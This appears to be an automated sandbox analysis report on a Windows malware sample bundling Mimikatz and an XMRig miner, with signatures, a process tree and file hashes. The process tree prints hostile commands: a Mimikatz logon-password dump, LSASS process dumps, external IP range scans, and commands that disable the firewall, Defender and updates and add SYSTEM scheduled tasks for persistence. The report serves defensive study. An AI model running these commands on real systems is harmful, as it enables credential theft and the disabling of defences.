Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    06-09-2024 10:00

General

  • Target

    2024090668e8027700ced82e12f0c7e3d4b49c6ehacktoolsicedidmimikatz.exe

  • Size

    8.9MB

  • MD5

    68e8027700ced82e12f0c7e3d4b49c6e

  • SHA1

    39775145e4c4f6f4e77b33a93da2e271479cccff

  • SHA256

    02b7e0e5bc611b4806a6815e02bd344dea840e0175eb09eeb16684dbe190b0e8

  • SHA512

    bae703ce32284593b8f6428ae9a70516adb605bb96cb8bed00755410e04066e794ebb868079800f8b1957b5e72d87da1fbf3cedfd31778d37f04cab00156f1ab

  • SSDEEP

    196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (16079) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 10 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 7 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 19 IoCs
  • Loads dropped DLL 25 IoCs
  • UPX packed file 33 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 12 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 14 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 31 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:276
      • C:\Windows\TEMP\peaalhnbi\uchlem.exe
        "C:\Windows\TEMP\peaalhnbi\uchlem.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1512
    • C:\Users\Admin\AppData\Local\Temp\2024090668e8027700ced82e12f0c7e3d4b49c6ehacktoolsicedidmimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024090668e8027700ced82e12f0c7e3d4b49c6ehacktoolsicedidmimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2504
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\mintttbi\rslbqgb.exe
        2⤵
        • Loads dropped DLL
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2108
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2348
        • C:\Windows\mintttbi\rslbqgb.exe
          C:\Windows\mintttbi\rslbqgb.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2484
    • C:\Windows\mintttbi\rslbqgb.exe
      C:\Windows\mintttbi\rslbqgb.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2236
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1920
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2720
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2708
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2904
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2812
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:2700
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
              PID:2792
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static del all
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            • Modifies data under HKEY_USERS
            PID:2568
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=Bastards description=FuckingBastards
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            • Modifies data under HKEY_USERS
            PID:2976
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=BastardsList action=block
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:2996
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\svutttncc\tezuchwia\wpcap.exe /S
            2⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1296
            • C:\Windows\svutttncc\tezuchwia\wpcap.exe
              C:\Windows\svutttncc\tezuchwia\wpcap.exe /S
              3⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in System32 directory
              • Drops file in Program Files directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1352
              • C:\Windows\SysWOW64\net.exe
                net stop "Boundary Meter"
                4⤵
                  PID:332
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "Boundary Meter"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:1952
                • C:\Windows\SysWOW64\net.exe
                  net stop "TrueSight Meter"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:1156
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "TrueSight Meter"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:1388
                • C:\Windows\SysWOW64\net.exe
                  net stop npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2752
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:2628
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2176
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:2152
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
                PID:2784
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                    PID:920
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      4⤵
                        PID:1796
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net start npf
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:1772
                    • C:\Windows\SysWOW64\net.exe
                      net start npf
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1948
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 start npf
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:852
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c C:\Windows\svutttncc\tezuchwia\ciiebagbs.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\svutttncc\tezuchwia\Scant.txt
                    2⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:1204
                    • C:\Windows\svutttncc\tezuchwia\ciiebagbs.exe
                      C:\Windows\svutttncc\tezuchwia\ciiebagbs.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\svutttncc\tezuchwia\Scant.txt
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:1236
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c C:\Windows\svutttncc\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\svutttncc\Corporate\log.txt
                    2⤵
                    • Loads dropped DLL
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    PID:792
                    • C:\Windows\svutttncc\Corporate\vfshost.exe
                      C:\Windows\svutttncc\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:836
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bgeqcsyin" /ru system /tr "cmd /c C:\Windows\ime\rslbqgb.exe"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3028
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2008
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "bgeqcsyin" /ru system /tr "cmd /c C:\Windows\ime\rslbqgb.exe"
                      3⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:2240
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "silbiftwc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\mintttbi\rslbqgb.exe /p everyone:F"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:552
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2348
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "silbiftwc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\mintttbi\rslbqgb.exe /p everyone:F"
                      3⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:2500
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ieywetnts" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\peaalhnbi\uchlem.exe /p everyone:F"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:1500
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2496
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "ieywetnts" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\peaalhnbi\uchlem.exe /p everyone:F"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:1812
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    PID:3012
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:2284
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • Modifies data under HKEY_USERS
                    PID:2220
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:2728
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3020
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    PID:2688
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1532
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    PID:1632
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    PID:1560
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    PID:1928
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    PID:1248
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    PID:1348
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop SharedAccess
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:1756
                    • C:\Windows\SysWOW64\net.exe
                      net stop SharedAccess
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2884
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop SharedAccess
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:2432
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh firewall set opmode mode=disable
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:2636
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh firewall set opmode mode=disable
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      • Modifies data under HKEY_USERS
                      PID:2424
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh Advfirewall set allprofiles state off
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:2448
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh Advfirewall set allprofiles state off
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:2268
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop MpsSvc
                    2⤵
                      PID:2376
                      • C:\Windows\SysWOW64\net.exe
                        net stop MpsSvc
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:844
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop MpsSvc
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:2408
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop WinDefend
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:1848
                      • C:\Windows\SysWOW64\net.exe
                        net stop WinDefend
                        3⤵
                          PID:1992
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop WinDefend
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:1208
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop wuauserv
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:1352
                        • C:\Windows\SysWOW64\net.exe
                          net stop wuauserv
                          3⤵
                            PID:1356
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop wuauserv
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:1084
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config MpsSvc start= disabled
                          2⤵
                            PID:1296
                            • C:\Windows\SysWOW64\sc.exe
                              sc config MpsSvc start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:1272
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config SharedAccess start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:2248
                            • C:\Windows\SysWOW64\sc.exe
                              sc config SharedAccess start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:2452
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config WinDefend start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:2864
                            • C:\Windows\SysWOW64\sc.exe
                              sc config WinDefend start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:1236
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config wuauserv start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:1092
                            • C:\Windows\SysWOW64\sc.exe
                              sc config wuauserv start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:2344
                          • C:\Windows\TEMP\xohudmc.exe
                            C:\Windows\TEMP\xohudmc.exe
                            2⤵
                            • Executes dropped EXE
                            • Drops file in System32 directory
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of SetWindowsHookEx
                            PID:1696
                          • C:\Windows\TEMP\svutttncc\segneeyeb.exe
                            C:\Windows\TEMP\svutttncc\segneeyeb.exe -accepteula -mp 276 C:\Windows\TEMP\svutttncc\276.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:784
                          • C:\Windows\TEMP\svutttncc\segneeyeb.exe
                            C:\Windows\TEMP\svutttncc\segneeyeb.exe -accepteula -mp 1104 C:\Windows\TEMP\svutttncc\1104.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2956
                          • C:\Windows\TEMP\svutttncc\segneeyeb.exe
                            C:\Windows\TEMP\svutttncc\segneeyeb.exe -accepteula -mp 1168 C:\Windows\TEMP\svutttncc\1168.dmp
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2700
                          • C:\Windows\TEMP\svutttncc\segneeyeb.exe
                            C:\Windows\TEMP\svutttncc\segneeyeb.exe -accepteula -mp 1260 C:\Windows\TEMP\svutttncc\1260.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2684
                          • C:\Windows\TEMP\svutttncc\segneeyeb.exe
                            C:\Windows\TEMP\svutttncc\segneeyeb.exe -accepteula -mp 1676 C:\Windows\TEMP\svutttncc\1676.dmp
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2604
                          • C:\Windows\TEMP\svutttncc\segneeyeb.exe
                            C:\Windows\TEMP\svutttncc\segneeyeb.exe -accepteula -mp 496 C:\Windows\TEMP\svutttncc\496.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2588
                          • C:\Windows\TEMP\svutttncc\segneeyeb.exe
                            C:\Windows\TEMP\svutttncc\segneeyeb.exe -accepteula -mp 1752 C:\Windows\TEMP\svutttncc\1752.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:672
                          • C:\Windows\TEMP\svutttncc\segneeyeb.exe
                            C:\Windows\TEMP\svutttncc\segneeyeb.exe -accepteula -mp 2336 C:\Windows\TEMP\svutttncc\2336.dmp
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2880
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c C:\Windows\svutttncc\tezuchwia\scan.bat
                            2⤵
                            • Loads dropped DLL
                            PID:2000
                            • C:\Windows\svutttncc\tezuchwia\uambitltp.exe
                              uambitltp.exe TCP 194.110.0.1 194.110.255.255 445 512 /save
                              3⤵
                              • Executes dropped EXE
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              PID:664
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2124
                        • C:\Windows\SysWOW64\dqljao.exe
                          C:\Windows\SysWOW64\dqljao.exe
                          1⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of SetWindowsHookEx
                          PID:576
                        • C:\Windows\system32\taskeng.exe
                          taskeng.exe {3545CA88-F7C7-495D-B33B-CB14C42F2F76} S-1-5-18:NT AUTHORITY\System:Service:
                          1⤵
                            PID:1900
                            • C:\Windows\system32\cmd.EXE
                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\mintttbi\rslbqgb.exe /p everyone:F
                              2⤵
                                PID:1724
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                  3⤵
                                    PID:1160
                                  • C:\Windows\system32\cacls.exe
                                    cacls C:\Windows\mintttbi\rslbqgb.exe /p everyone:F
                                    3⤵
                                      PID:1944
                                  • C:\Windows\system32\cmd.EXE
                                    C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\peaalhnbi\uchlem.exe /p everyone:F
                                    2⤵
                                      PID:1648
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        3⤵
                                          PID:1760
                                        • C:\Windows\system32\cacls.exe
                                          cacls C:\Windows\TEMP\peaalhnbi\uchlem.exe /p everyone:F
                                          3⤵
                                            PID:1524
                                        • C:\Windows\system32\cmd.EXE
                                          C:\Windows\system32\cmd.EXE /c C:\Windows\ime\rslbqgb.exe
                                          2⤵
                                            PID:1908
                                            • C:\Windows\ime\rslbqgb.exe
                                              C:\Windows\ime\rslbqgb.exe
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                              • Suspicious use of SetWindowsHookEx
                                              PID:1248
                                          • C:\Windows\system32\cmd.EXE
                                            C:\Windows\system32\cmd.EXE /c C:\Windows\ime\rslbqgb.exe
                                            2⤵
                                              PID:3896
                                              • C:\Windows\ime\rslbqgb.exe
                                                C:\Windows\ime\rslbqgb.exe
                                                3⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                • Suspicious use of SetWindowsHookEx
                                                PID:2080
                                            • C:\Windows\system32\cmd.EXE
                                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\mintttbi\rslbqgb.exe /p everyone:F
                                              2⤵
                                                PID:3856
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                  3⤵
                                                    PID:2640
                                                  • C:\Windows\system32\cacls.exe
                                                    cacls C:\Windows\mintttbi\rslbqgb.exe /p everyone:F
                                                    3⤵
                                                      PID:2288
                                                  • C:\Windows\system32\cmd.EXE
                                                    C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\peaalhnbi\uchlem.exe /p everyone:F
                                                    2⤵
                                                      PID:3664
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                        3⤵
                                                          PID:4052
                                                        • C:\Windows\system32\cacls.exe
                                                          cacls C:\Windows\TEMP\peaalhnbi\uchlem.exe /p everyone:F
                                                          3⤵
                                                            PID:1532

                                                      Network

                                                      MITRE ATT&CK Enterprise v15

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\Windows\SysWOW64\Packet.dll

                                                        Filesize

                                                        95KB

                                                        MD5

                                                        86316be34481c1ed5b792169312673fd

                                                        SHA1

                                                        6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                                        SHA256

                                                        49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                                        SHA512

                                                        3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                                      • C:\Windows\SysWOW64\wpcap.dll

                                                        Filesize

                                                        275KB

                                                        MD5

                                                        4633b298d57014627831ccac89a2c50b

                                                        SHA1

                                                        e5f449766722c5c25fa02b065d22a854b6a32a5b

                                                        SHA256

                                                        b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                                        SHA512

                                                        29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

                                                      • C:\Windows\TEMP\peaalhnbi\config.json

                                                        Filesize

                                                        693B

                                                        MD5

                                                        f2d396833af4aea7b9afde89593ca56e

                                                        SHA1

                                                        08d8f699040d3ca94e9d46fc400e3feb4a18b96b

                                                        SHA256

                                                        d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

                                                        SHA512

                                                        2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

                                                      • C:\Windows\TEMP\svutttncc\1104.dmp

                                                        Filesize

                                                        1.3MB

                                                        MD5

                                                        1a72e3934f8241fc675f122e33138a43

                                                        SHA1

                                                        56eda969008c05b8cf2ff79391ac72619740c5d6

                                                        SHA256

                                                        e1c9eb109446db054e7ba8db83ce7bfb1936e71038bbbfcbad9fb8ea600fc5e4

                                                        SHA512

                                                        cee23e4d8ba9a0e4636f50bbed0e925081479a3ff4d5a6a6d4d7286ce9ccc59c7d42ee088dbfb7a56d3453cd4c13eb92401d410ff1b623c8ba61de3618113bc2

                                                      • C:\Windows\TEMP\svutttncc\1168.dmp

                                                        Filesize

                                                        1.3MB

                                                        MD5

                                                        23248e23864adbbe20641e401c3ef0ae

                                                        SHA1

                                                        ac1eb83b4340571ba66506df575dfcdf95098203

